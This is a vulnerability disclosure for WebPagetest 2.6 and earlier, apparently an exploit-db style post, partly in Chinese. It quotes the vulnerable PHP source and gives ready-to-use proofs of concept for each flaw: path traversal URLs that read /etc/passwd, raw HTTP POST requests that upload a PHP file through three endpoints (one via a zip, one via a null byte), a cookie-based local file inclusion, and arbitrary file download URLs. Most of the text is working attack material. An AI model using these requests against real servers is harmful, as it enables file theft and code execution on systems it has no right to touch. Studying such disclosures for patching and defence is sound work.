
WebPagetest <= 2.6多重缺陷

    [ WebPagetest <= 2.6 ]  Multiple Vulnerabilities  #
    #####################################################
    #
    # Script: "WebPagetest provides a system for testing the performance of web pages from multiple
    #          locations/configurations and consuming the results in a friendly web interface. "
    #
    开发者: http://www.webpagetest.org/about
    下载地址: http://code.google.com/p/webpagetest/downloads/list
    #
    #####################################################
    # [ 本地文件泄露 #1 ]
    # PoC: http://www.ihonker.org /gettext.php?file=../../../../../../../../../../../etc/passwd
    #
    # File: ./webpagetest/gettext.php (lines: 2-13)
    #  ..cut..
      include('common.inc');                                         // 1
      $ok = false;

      if( isset($_GET['file']) && strlen($_GET['file']) )            // 2
      {
          $data = gz_file_get_contents("$testPath/{$_GET['file']}"); // 3
          if( $data !== false )
          {
              $ok = true;
              echo $data;                                            // 7 [LFD]
          }
      }
    #  ..cut..
    #
    # File: ./webpagetest/common.inc (lines: 493-510)
    #  ..cut..
      function gz_file_get_contents($file)
      {
          $data = null;

          $zip = gzopen("$file.gz", 'rb');
          if( $zip === false )
              $zip = gzopen($file, 'rb');                             // 4

          if( $zip !== false )
          {
              $data = gzread($zip, 10000000);                         // 5
              gzclose($zip);
          }
          else
              $data = false;

          return $data;                                               // 6
      }
    #  ..cut..
    #
    #####################################################
    # [ 本地文件泄露 #2 ]
    # PoC: http://www.xxx.com /gettcpdump.php?file=../../../../../../../../../etc/passwd
    #
    # File: ./webpagetest/gettcpdump.php (lines: 2-13)
    #  ..cut..
      include('common.inc');                                            // 1
      $file = "$testPath/{$_GET['file']}";                              // 2

      if( isset($_GET['file']) && strlen($_GET['file']) && gz_is_file($file) ) // 3
      {
          header ("Content-type: application/octet-stream");
          gz_readfile_chunked($file);                                   // 5
      }
    #  ..cut..
    #
    # File: ./webpagetest/common.inc (lines: 460-486, 586-590)
    #  ..cut..
      function gz_readfile_chunked($filename, $retbytes = TRUE)
      {
          $buffer = '';
          $cnt =0;
          $handle = gzopen("$filename.gz", 'rb');
          if ($handle === false)
              $handle = gzopen($filename, 'rb');                        // 6
          if ($handle === false)
              return false;
          while (!gzeof($handle))
          {
              $buffer = gzread($handle, 1024 * 1024);  // 1MB at a time // 7
              echo $buffer;                                             // 8 [LFD]
    #  ..cut..
          }
    #  ..cut..
          return $status;
      }
    #  ..cut..
      function gz_is_file($filename)
      {
          $ret = is_file("$filename.gz") || is_file($filename);         // 4
          return $ret;                                                  //
      }
    #  ..cut..
    #
    #####################################################
    # [ Local File Disclosure #3 ]
    # PoC: http://localhost/getgzip.php?file=../../../../../../../../../etc/passwd
    # This case is very similar to the two above.
    #
    #####################################################
    # [ Arbitrary File Upload #1 ]
    # File: ./webpagetest/work/resultimage.php (lines: 18-48)
    #  ..cut..
      $locKey = $locations[$location]['key'];
      if( (!strlen($locKey) || !strcmp($key, $locKey)) || !strcmp($_SERVER['REMOTE_ADDR'], "127.0.0.1") )  // 1 true
      {
          if( isset($_FILES['file']) )                                                                     // 2
          {
              $fileName = $_FILES['file']['name'];                                                         // 3
              $path = './' . GetTestPath($id);                                                             // $path = './results/'
    #  ..cut..
              logMsg(" Moving uploaded image '{$_FILES['file']['tmp_name']}' to '$path/$fileName'\n");
              move_uploaded_file($_FILES['file']['tmp_name'], "$path/$fileName");                          // 4 [AFU]
          }
          else
              logMsg(" no uploaded file attached");
      }
    #  ..cut..
    # PoC: http://www.xxx.com /work/resultimage.php
      POST /work/resultimage.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Cache-Control: max-age=0
      Content-Type: multipart/form-data; boundary=---------------------------31101243933548
      Content-Length: 209
      -----------------------------31101243933548
      Content-Disposition: form-data; name="file"; filename="info.php"
      Content-Type: text/x-php

      <?php phpinfo(); ?>

      -----------------------------31101243933548--
    # Uploaded file will be here: http://localhost/results/info.php
    #
    #####################################################
    # [ 任意文件上传 #2 ]
    # File: ./webpagetest/work/dopublish.php (lines: 2-31)
    #  ..cut..
      require_once('../lib/pclzip.lib.php');                              // 1
      include '../common.inc';
      header('Content-type: text/plain');
      header("Cache-Control: no-cache, must-revalidate");
      header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
      set_time_limit(300);

      // make sure a file was uploaded
      if( isset($_FILES['file']) )                                        // 2
      {
          $fileName = $_FILES['file']['name'];                            // 3

          // create a new test id
          $today = new DateTime("now", new DateTimeZone('America/New_York'));
          $id = $today->format('ymd_') . md5(uniqid(rand(), true));       // 4

          $path = '../' . GetTestPath($id);                               // 5

          // create the folder for the test results
          if( !is_dir($path) )
              mkdir($path, 0777, true);
       
          // extract the zip file
          $archive = new PclZip($_FILES['file']['tmp_name']);             // 6
          $list = $archive->extract(PCLZIP_OPT_PATH, "$path/", PCLZIP_OPT_REMOVE_ALL_PATH); // 7 [AFU]
          if( !$list )
              unset($id);

          echo $id;
      }
    #  ..cut..
    # In this case a zip archive containing the PHP file (info.php) has to be created.
    # On upload, the archive is automatically unzipped into the results folder.
    # PoC: http://localhost/work/dopublish.php
      POST /work/dopublish.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Content-Type: multipart/form-data; boundary=---------------------------4966737613931
      Content-Length: 214
      -----------------------------4966737613931
      Content-Disposition: form-data; name="file"; filename="info.zip"
      Content-Type: application/x-zip-compressed


      [zip file]

      -----------------------------4966737613931--
    # After the upload, the script prints a string, for example: 120711_718a3a42e314a0cb740ee66b7b92b9ac.
    # This means the uploaded and unzipped file is in the folder /results/12/07/11/718a3a42e314a0cb740ee66b7b92b9ac/
    # Uploaded file will be here: http://localhost/results/12/07/11/718a3a42e314a0cb740ee66b7b92b9ac/info.php
    #
    #####################################################
    # [ Arbitrary File Upload #3 ] magic_quotes_gpc = Off;
    # File: ./webpagetest/work/workdone.php (lines: 12-45)
    #  ..cut..
      $id = $_REQUEST['id'];                                             // 1
    #  ..cut..
      if( $_REQUEST['video'] )                                           // 2
      {
          logMsg("Video file $id received from $location");

          $dir = './' . GetVideoPath($id);                               // 3
          if( isset($_FILES['file']) )                                   // 4
          {
              $dest = $dir . '/video.mp4';                               // 5 $dest = ./results/video/../info.php%00/video.mp4
              move_uploaded_file($_FILES['file']['tmp_name'], $dest);    // 6 [AFU]
    #  ..cut..
          }
      }
    #  ..cut..
    # PoC: http://localhost/work/workdone.php?video=1&id=../info.php%00
      POST /work/workdone.php?video=1&id=../info.php%00 HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Content-Type: multipart/form-data; boundary=---------------------------187161971819895
      Content-Length: 211
      -----------------------------187161971819895
      Content-Disposition: form-data; name="file"; filename="info.php"
      Content-Type: text/x-php

      <?php phpinfo(); ?>

      -----------------------------187161971819895--
    # Uploaded file will be here: http://localhost/results/info.php
    #
    #####################################################
    # [ Local File Inclusion ] magic_quotes_gpc = Off;
    # File: ./webpagetest/about.php (line: 20)
    #  ..cut..
      include 'header.inc';                                             // 1
    #  ..cut..
    #
    # File: ./webpagetest/header.inc (lines: 43-47)
    #  ..cut..
               elseif(isset($_COOKIE["cfg"]))
                   $testLoc = $_COOKIE["cfg"];                          // 2
               
               if( isset($testLoc) && strlen($testLoc) && is_file("./custom/$testLoc/headerAd.inc") ) // 3
                   include("./custom/$testLoc/headerAd.inc");           // 4 [LFI]
    #  ..cut..
    #
    # PoC: http://localhost/about.php
      GET /about.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Cookie: cfg=../../../../../../../../../etc/passwd%00
    #
    #####################################################
    # [ Arbitrary File Download #1 ] register_globals = On
    # PoC: http://localhost/download.php?testPath=./relay/../../../../../../../../../etc/
    # If the "relay" directory exists, the script compresses all files in the directory
    # named by the testPath variable into a zip archive, which is then sent to the browser.
    #
    #####################################################
    # [ Arbitrary File Download #2 ] magic_quotes_gpc = Off;
    # PoC: http://localhost/video/download.php?id=../../../../../../../../../../../etc/passwd%00
    #
    #####################################################
